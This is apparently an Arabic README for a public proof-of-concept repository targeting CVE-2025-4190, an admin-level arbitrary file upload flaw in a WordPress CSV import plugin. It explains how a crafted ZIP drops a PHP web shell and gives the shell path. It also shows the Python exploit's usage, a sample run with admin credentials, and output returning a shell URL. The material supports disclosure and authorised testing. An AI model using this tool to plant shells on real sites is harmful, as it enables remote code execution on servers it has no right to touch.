
CSV Mass Importer <= 1.2 - رفع ملفات تعسفي بصلاحيات Admin+
إضافة CSV Mass Importer (≤ 1.2) لووردبريس تحتوي على ثغرة رفع ملفات تعسفي بصلاحيات Admin+.
بسبب التحقق غير السليم من الملفات المرفوعة، يمكن للمستخدمين ذوي الصلاحيات العالية (مثل المدير) رفع ملفات تعسفية على الخادم، حتى عندما يجب تقييد ذلك — على سبيل المثال في إعدادات تعدد المواقع (multisite).
تسمح هذه الثغرة للمهاجم برفع قذائف PHP أو ملفات خبيثة، مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE) على الخادم.
اكتشفها Nxploited (Khaled Alenazi).
تفشل الإضافة في التحقق بشكل صحيح من الملفات المرفوعة عند استخدام ميزة استيراد CSV.
يمكن رفع ملف ZIP مُعدّ بعناية يحتوي على قذيفة PHP واستخراجه إلى دليل يمكن الوصول إليه بشكل عام.
مثال على مسار القذيفة:
<target-url>/wp-content/uploads/cmi-data/nxploited.php
يحتوي هذا المستودع على سكربت استغلال جاهز بلغة Python: 4190.py
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL
--username, -un USERNAME
WordPress admin username
--password, -p PASSWORD
WordPress admin password
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
هذا الكود مقدم لأغراض تعليمية فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا السكربت.
استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن باختبارها.
اكتشفه وطوّره Khaled Alenazi (Nxploited) 🌟